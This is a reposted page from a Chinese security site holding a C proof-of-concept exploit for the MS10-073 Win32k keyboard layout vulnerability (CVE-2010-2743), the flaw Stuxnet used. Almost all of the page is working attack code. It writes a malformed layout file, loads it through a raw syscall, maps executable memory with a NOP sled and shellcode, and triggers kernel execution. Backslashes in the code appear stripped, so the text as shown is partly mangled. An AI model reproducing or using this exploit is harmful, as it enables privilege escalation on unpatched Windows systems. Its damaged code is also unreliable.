Exp - MS10-073 Win32k Keyboard Layout

admin 2021年4月3日18:53:49评论49 views字数 5964阅读19分52秒阅读模式

MS10-073: Win32k Keyboard Layout Vulnerability

Code:

// My koala is staring at you  CºgºD
// Source: http://reversemode.com/index.php?option=com_content&task=view&id=71&Itemid=1
 
 
#include
#include
#include
 
 
#define MAGIC_OFFSET 0x6261
 
#define InitializeUnicodeStr(p,s) {    
     (p)->Length= wcslen(s)*2;          
     (p)->MaximumLength = wcslen(s)*2+2;
     (p)->Buffer = s;               
     }
 
 
_declspec(naked) HKL __stdcall NtUserLoadKeyboardLayoutEx
(
   IN HANDLE Handle,
   IN DWORD offTable,
   IN PUNICODE_STRING puszKeyboardName,
   IN HKL hKL,
   IN PUNICODE_STRING puszKLID,
   IN DWORD dwKLID,
   IN UINT Flags
)
{
    __asm
    {
        mov eax, 000011c6h
        mov edx, 7ffe0300h
        call dword ptr [edx]
        retn 1Ch
    }
}
 
 
unsigned char shellcode[]="x90x90x90x90xC2x0Cx00x90x90";
 
unsigned char fakeDll[]="x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x40x00x00x00"
                        "x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00xE0x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x2Ex64x61x74x61x00x00x00"
                        "xE6x00x00x00x60x01x00x00xE6x00x00x00x60x01x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x94x01x00x00x9Ex01x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "xA6x01x00x00xAAx01x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x9Cx01x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x01x00x00x00xC2x01x00x00x00x00x00x00x00x00"
                        "x00x00x00x05x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
                        "x00x00x00x00x00x00";
 
int main(int argc, CHAR* argv[])
{
    
    UNICODE_STRING  uStr;
 
    KEYBDINPUT      kb={0};
    INPUT           vInput={0};
    
    HANDLE          hFile;
    DWORD           dwFuckS0ny;
    
    HKL             hKbd;
    
    WCHAR           lpPath[MAX_PATH]={0};
    WCHAR           lpLayoutFile[MAX_PATH]={0};
 
    LPVOID          lpShellPtr;
 
 
 
    printf("nnStuxnet MS10-073/CVE-2010-2743 Exploitn");
    printf("Ruben Santamarta -

nn");
    
    
 
    LoadLibraryA("user32.dll");
 
    InitializeUnicodeStr(&uStr,L"pwn3d.dll");
 
    GetTempPathW( MAX_PATH, lpPath );
 
    wsprintf( lpLayoutFile, L"%lSp0wns.boom", lpPath);
 
 
    hFile = CreateFileW(lpLayoutFile,
                        GENERIC_READ|GENERIC_WRITE,
                        FILE_SHARE_READ|FILE_SHARE_WRITE,
                        0,
                        CREATE_ALWAYS,
                        0,0);
 
    if( hFile == INVALID_HANDLE_VALUE )
    {
        printf(" n[!!] Errorn");
        exit(0);
    }
 
    WriteFile(  hFile,
                fakeDll,
                sizeof(fakeDll)-1,
                &dwFuckS0ny,
                NULL);
 
    printf("n[+] Writing malformed kbd layout file nt"%S"nt[ %d ] bytes writtenn",lpLayoutFile,dwFuckS0ny);
    CloseHandle(hFile);
 
    hFile = CreateFileW (lpLayoutFile,
                            GENERIC_READ,
                            FILE_SHARE_READ,
                            0,
                            OPEN_EXISTING,
                            0,0);
 
    if( hFile == INVALID_HANDLE_VALUE )
    {
        printf(" n[!!] Errorn");
        exit(0);
    }
    
    hKbd = GetKeyboardLayout( GetWindowThreadProcessId( GetForegroundWindow(), &dwFuckS0ny ) );
    
 
    printf("n[+] Loading it...[ 0x%x ]n", NtUserLoadKeyboardLayoutEx( hFile, 0x01AE0160, NULL, hKbd, &uStr, 0x666, 0x101 ) );
 
    lpShellPtr = VirtualAlloc( (LPVOID)0x60630000,
                                0xF000,
                                MEM_COMMIT|MEM_RESERVE,
                                PAGE_EXECUTE_READWRITE);
 
    printf("n[+] Allocating memory...");
 
    if( !lpShellPtr )
    {
 
        printf("[!!] Error %xn",GetLastError());
        exit(0);
 
    }else{
 
        printf("[ OK ]n");
 
    }
    
    memset( lpShellPtr, 0x90, 0xF000);
 
    memcpy( ( void* )( ( ULONG_PTR ) lpShellPtr + MAGIC_OFFSET ),
            ( const void* )shellcode,
            sizeof( shellcode ) - 1 );
 
    kb.wVk = 0x0;
    vInput.type  = INPUT_KEYBOARD;
    vInput.ki  = kb;
 
    printf("n[+] Triggering shellcode...");
    SendInput( 1, ( LPINPUT ) &vInput, sizeof( INPUT ) );
 
    printf("n[+] Donen");
 
    return 0;
}

文章来源于lcx.cc:Exp - MS10-073 Win32k Keyboard Layout

相关推荐: 【视频】 - 山东单县农民草根明星朱之文

视频,山东单县农民草根明星朱之文,牛人,是金子总会发光的   山东农民歌手   朱之文   《我是大明星》上一曲《临江仙•滚滚长江东逝水》唱响了他的名字!   山东菏泽单县郭村镇朱楼村一名42岁的普通农民,无处不留下了他美妙的歌声,没有舞台的璀璨星光,简陋的小…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日18:53:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Exp - MS10-073 Win32k Keyboard Layouthttp://cn-sec.com/archives/319089.html

发表评论

匿名网友 填写信息